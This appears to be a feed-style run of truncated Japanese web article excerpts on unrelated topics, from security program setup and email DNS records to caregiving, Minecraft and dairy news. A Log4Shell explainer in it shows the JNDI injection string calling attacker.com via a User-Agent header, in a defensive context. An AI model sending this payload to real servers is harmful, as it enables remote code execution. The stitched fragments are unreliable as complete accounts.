最近、セキュリティの立ち上げで何をやったらいいかわからない、という質問を何度か受けるケースがあったので、最初に何をやるか、というのを情シスやセキュリティ担当者としての考えをまとめてみる。 著者のキャリアについて セキュリティの立ち上げについて書く以上、信頼に足る情報源なのか？という疑問がわくと思うので、簡単に著者のキャリアを書いておきます。 2002年にSIerでIT業界に入り、研究所のNetwork Admin、Web penetration test、ISMSコンサルの補佐などやり、その後外資プリセール分野で7年仕事して、最初のSIに戻ってセキュリティソリューションの立ち上げを担当、その後ユーザーサイドにキャリアを変えて、外資石油系企業のセキュリティアナリスト、中国系スタートアップのInfoSec Director&一人情シスをやってきたキャリアです。CISSPは2019年に取得してお

ドメインを取得後にそれを使ったメールアドレスで送信できるようになったが、受信先でそのメールが迷惑フォルダへ分類されることがある。 会社では Google Domain でドメインを取得後、Google Workspace を利用してメールを送信できるようになった。DNS の管理は Cloud DNS を利用していて、その設定は Terraform を用いて管理している。 当初の設定はシンプルなものであった。 DNS ゾーンを設定 設定したゾーンに対して MX レコードを設定 resource "google_dns_managed_zone" "example_com_domain" { name = "example-com" dns_name = "example.com." } # https://support.google.com/a/answer/9222085 resourc

日本は超高齢化社会を迎え、いまや総人口に対する高齢者の割合は世界トップの国となった。しかし、介護や福祉のニーズが今後高まり続ける中で、それを支える人材の不足が喫緊の課題である。これを解消する一つの施策として、海外からの人材を受け入れる事業所が増えてきたが、言語の壁などが受け入れ促進を阻んでいる。そこで、今回は一世紀にわたって国語を研究し続けている“金田一家”の三代目・金田一秀穂氏に、言葉の壁や非言語コミュニケーションをテーマに話を伺った。 文責／みんなの介護 SNSによる短文のやり取りが相手の誤解を招くことも みんなの介護　いまやインターネットは私たちの仕事や生活と切り離せない存在です。また、SNSの普及によって言葉の使われ方もずいぶん変化してきました。金田一さんは言語学者として、このような状況をどのように受け止めているのでしょう。 金田一　言葉というのは考えを組み立てるための道具なんです

「CEOに身代金を要求したい」 こんにちは、PSIRTマネージャのただただし（tdtds）です。この記事はfreee Developers Advent Calendar 2021 18日目です。 freeeにjoinしてから早くも14ヶ月がすぎました。freeeでは毎年10月に全社障害訓練をしていて、昨年は入社したてで右も左もわからないままAWS上の本番環境（のレプリカ）に侵入してDBをぶっ壊す役目をさせられたのも良い思い出です*1。 で、上の「CEOに身代金を要求したい」という物騒な相談は、今年の訓練計画の話です。話を持ち掛けてきたのはCIOの土佐。昨年は主要サービスが落ちて、開発チームが対応にあたる中、ビジネスサイドも顧客対応などで訓練参加しましたが、今年はさらに、経営サイドまで巻き込もうというゴール設定がされたわけですね。腕が鳴ります。 ゴールは「CEOに4BTCを要求する」 ゴー

累計販売本数が2億本を超えたり、YouTubeでの総視聴回数が1兆回を超えたりと、世界的に人気のある箱庭ゲーム「マインクラフト」はサバイバル生活を楽しんだり、自由にブロックを配置し建築などを楽しんだりできるのが売りです。そんなマインクラフトで「レッドストーン」というアイテムを駆使して周波数1HzのCPU「CHUNGUS 2」を設計したと、YouTuberのsammyuri氏が発表しました。 CHUNGUS 2 - A very powerful 1Hz Minecraft CPU - YouTube CHUNGUS 2は「Computational Humongous Unconventional Number and Graphics Unit by Sammyuri 2」の略称。 CHUNGUS 2はクロック1Hzで10tickの16bitCPUで、3オペランド命令のRISCアーキテク

このページは、お使いのコンピュータ―ネットワークから利用規約に違反すると考えられるリクエストが自動検出されたときに表示されます。 みんなの介護では、本サービスを通常に利用する行為を超え、サーバーに負荷をかける行為、 もしくはそれを助長するような行為、HTMLデータを収集して特定のデータを抽出する行為、 その他本サービスの運営・提供、もしくはカスタマーによる本サービスの利用を妨害し、 またはそれらに支障をきたす行為を禁止しています。 利用規約に違反する行為と判断した場合、 プロバイダに対し、IPアドレスから個人情報開示請求を行い、 損害賠償等、法的措置を含めた対応を行う場合があります。 IPアドレス：133.242.243.6 時間：2024/05/04 05:06:29 URL：https://www.minnanokaigo.com/errors/block 詳しくは利用規約をご確認くだ

国土交通省が建設業の受注動向などを示す統計の調査票の書き換えを指示しデータを二重に計上していた問題で、おととし以前の調査票の原本が保存期間の2年をすぎて廃棄されていることが分かりました。 不適切なデータの取り扱いは8年前から続いていたとみられていますが、今後の調査で詳しい経緯や二重計上の実態をどこまで明らかにできるかが課題となります。 国土交通省は15日、建設業の毎月の受注動向などを示す「建設工事受注動態統計」で、データの不適切な取り扱いがあったと明らかにしました。 データは「調査票」の形で事業者から毎月集めていますが、国土交通省は都道府県の担当者に対し、事業者から期限に遅れて複数の月の調査票がまとめて提出された場合には、直近の1か月の受注額に合算する形で調査票を書き換えるよう指示していたということです。 しかし、8年前の2013年度以降は、期限に遅れた事業者についても受注実績をゼロとせず

JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を

この年末年始、牛乳や乳製品の原料となる生乳がかつてない規模で余り、廃棄される可能性があることが、業界団体が行った試算で分かりました。コロナ禍で落ち込んだ業務用のバターなどの需要が回復しない中、学校給食が休みになることなどが背景にあり、廃棄を避けようと、団体は牛乳の消費拡大などに力を入れています。 在庫量が過去最高水準まで増加 乳業メーカーや酪農家でつくる業界団体の「Jミルク」によりますと、生乳の生産量は、6年ほど前のバター不足などを受けて増産に取り組んできた効果がここ数年あらわれているほか、ことしは夏場の気温が低く、乳が出やすかったということで、今年度の生産量は昨年度より17万トン余り多くなる見通しです。 一方、新型コロナウイルスの感染拡大以降、業務用のバターや脱脂粉乳の需要が落ち込んでいて、在庫の量は過去最高の水準まで増えているということです。 そのうえ年末年始は、学校給食が無くなるなど

Epic、映画「マトリックス」の世界が舞台の「Unreal Engine 5」の仮想都市デモをPS5とXboxで無料提供 米Epic Gamesは12月10日（現地時間）、ゲームエンジン「Unreal Engine 5」（UE5）の技術デモとして、映画「マトリックス」の世界を舞台にした「The Matrix Awakens: An Unreal Engine 5 Experience」を発表した。同日、「PlayStation 5」と「Xbox Series X／S」で無料でダウンロードできるようになった。約29GBのデータだ。 日本では12月17日に公開される映画「マトリックス」シリーズの最新作「マトリックス レザレクションズ」のラナ・ウォシャウスキー監督や映画の技術陣がEpicのエンジニアチームと協力して制作した。 デモの冒頭にはキアヌ・リーブス演じるネオとキャリー・アン・モス演じるト

ウェブサイトのリッチな表現に欠かせないアニメーション。実装にはCSSを使ったものからJavaScriptを使ったもの、WebGLを使ったものまでありますが、今回はTween24.jsを使ったウェブ制作の場面で使える実践的表現を紹介します。 基本的な導入方法や使い方は記事『新感覚！メソッドチェーンでアニメーションがスラスラ書ける「Tween24.js」を作りました』をご覧ください。 CSSアニメーションとの違い CSSのtransitionプロパティや@keyframesを使ったアニメーションなどがあります。これらは比較的手軽にアニメーションを実装できるのがメリットです。手軽さとは引き換えに複雑なアニメーションや動的に変数が変わるようなアニメーションが苦手です。一方でJavaScriptを使った手法は、複雑なものや動的なアニメーションも実装できるメリットがありますが、CSSと比べると記述量も

「石田陽子さんの記事（被害者への保険金を抑えようとする損保会社　事故で全身まひの女子大生への冷酷対応）を読ませてもらいました。本当に大変な思いをされていると思います。うちの息子も18歳のときの事故でしたが、同じく加害者側の損保会社から『余命10年』と言われました」 そう語るのは、大阪府の坂本清市さん（55）です。 次男の裕貴さん（当時18）が事故に遭ったのは、2011年9月。バイクで交差点を直進中、突然右折してきた対向車に衝突され、脳挫傷で重度の後遺障害（遷延性意識障害）を負ったのです（下記の記事参照）。 ＜車に衝突され、意識不明の息子 9年半介護続ける両親の割り切れぬ思い【親なき後を生きる】（柳原三佳） - 個人 - Yahoo!ニュース＞ すでに事故から10年以上が経過しました。 両親と兄、そして訪問介護ヘルパーの手を借りながら自宅で生活している裕貴さん（筆者撮影） ■「寝たきり者はベ

Originally Posted @ December 9th & Last Updated @ August 1st, 3:30pm PDT Fixing Log4Shell? Claim a free vulnerability scan on our dedicated security platform and generate a detailed report in minutes. What is it?​On Thursday, December 9th a 0-day exploit in the popular Java logging library log4j (version 2), called Log4Shell, was discovered that results in Remote Code Execution (RCE) simply by log

このブログはグロースエクスパートナーズ Advent Calendar 2021の10日目です。 社内メンバーから要望があったので、僕自身がどのようにシステム開発の初期段階において、どのように要望を整理し、形にしていっているのかについて書きたいと思います。 なお内容は弊グループの案件を前提にしているので、システム開発は以下のような状況が一般的です。 クライアントは直接契約（プライム） 要望を出すのはクライアント企業内で事業運営側の人で、システム開発にかかわった経験がないことがある 対象システムはSoE/mode2で、一般消費者や取引先などの外部ユーザーと、社内で業務を回す内部ユーザーがいる 相手の話を整理するフレーム まず、相手から得られる情報を4つの階層にわけて整理する必要があります。 目的：達成すべきこと 戦略：目的を確実・効率的に達成するためのシナリオ 戦術：戦略を実行するための具体

初めましてカナザワと申します。 普段は映像やグラフィックデザインのお仕事をしています。 今回はBlenderを使ったセルルックアニメーションや、映像作りにも使えるエフェクト表現について書...

税理士。円満相続税理士法人代表 中学・高校とバンド活動に明け暮れ、大学受験の失敗から一念発起し税理士を志す。 大学在学中に税理士試験に4科目合格（「資格の大原」主催の法人税法の公開模試では全国1位）。大学卒業前から国内最大手の税理士法人山田＆パートナーズに正社員として入社する。 税理士法人山田＆パートナーズでは相続専門の部署で6年間、相続税に専念。これまで手がけた相続税申告（相続手続）は、上場企業の創業家や芸能人を含め、通算500件以上。相続税の相談実績は5000人を超える。また、全国の銀行や証券会社を中心に通算500回以上の相続税セミナーの講師を務める。 2017年1月に独立開業。現在、東京・大阪の2拠点で相続専門税理士が多数在籍する円満相続税理士法人の代表を務める。「最高の相続税対策は、円満な家族関係を構築すること」をモットーに、依頼者に徹底的に寄り添い、円満相続実現のために日々尽力す

この記事は Classi developers Advent Calendar 2021 の 7日目の記事です。 こんにちは。顧客サポート基盤チーム兼、技術戦略室にてエンジニアをしています、中島です。 みなさんは、日々仕事をする上で必須である「誰かに質問をする」という行為について、自信を持って適切に行うことはできているでしょうか？ 先月弊社では外部講師である、株式会社フィッシャーデータのあんちべさん をお招きし、質問力向上のための研修を実施しました。今回はこの研修を実施するに至った背景、研修内容を少しお見せするのと、社内の反響をお伝えします。 質問力を向上しよう！と至った背景 弊社は2020年2月頃よりリモートワークへの移行を行い、1年半以上が経過しました。リモートワークのお困りごととして一般的にもよく聞かれる、コミュニケーションについての課題を見聞きするようになってきました。 （ちなみに

株式会社JMDC開発本部データ基盤開発部の中村と申します。 私が所属する医療機関基盤グループでは、昨年から今年にかけて基幹システムをオンプレからクラウド（AWS）へ刷新しました。 この移行プロジェクトは、JMDC史上トップを争うくらい難易度の高いプロジェクトだったと個人的に感じています。マネージャーの立場から今回のシステム刷新のきっかけや、プロジェクトのハードな道のり、そしてクラウド化で得られた成果などを振り返っていきます。 プロフィール 中村竜甫（https://twitter.com/rh1011_） 株式会社JMDC 開発本部 データ基盤開発部 医療機関データ基盤グループ マネージャー SIerにて広告配信システムの企画・開発・運用を経験。その後2015年9月から現職。 基幹システムの刷新リーダーを担当後、Webプロダクト開発のマネージメントを経験。現在は医療機関基盤Gマネージャとし

そもそも移民難民というテーマが「言説強化のためのネタ」に成り果てており、ドイツでの実績や教訓についても、自陣営にとって都合の良い部分だけをピックアップし、針小棒大に膨らましてアジテーションするだけ、という状況が半ば固定化しています。 あの論争の延長上に何かまともなものが生じるようには思えませんが、それはそうと、移民流入・定着後にドイツ人が本当に「移民の受け入れは失敗だった」と思っているのかどうかは、意外と検証されていません。 「アイデンティティが危機！」という反発はドイツにもある 受け入れてみて実際ヤバかったのかそれとも案外いけたのか。そのへん単なる主観的一例っていう前提でいいからインサイダー的見解を教えて欲しい、と文春オンライン編集氏に言われ、確かにこの観点でのドイツ自己分析は日本であまり見ないし、コロナ直前までドイツと日本を行ったり来たり二重生活していたからあっちの実感もわかるし、それ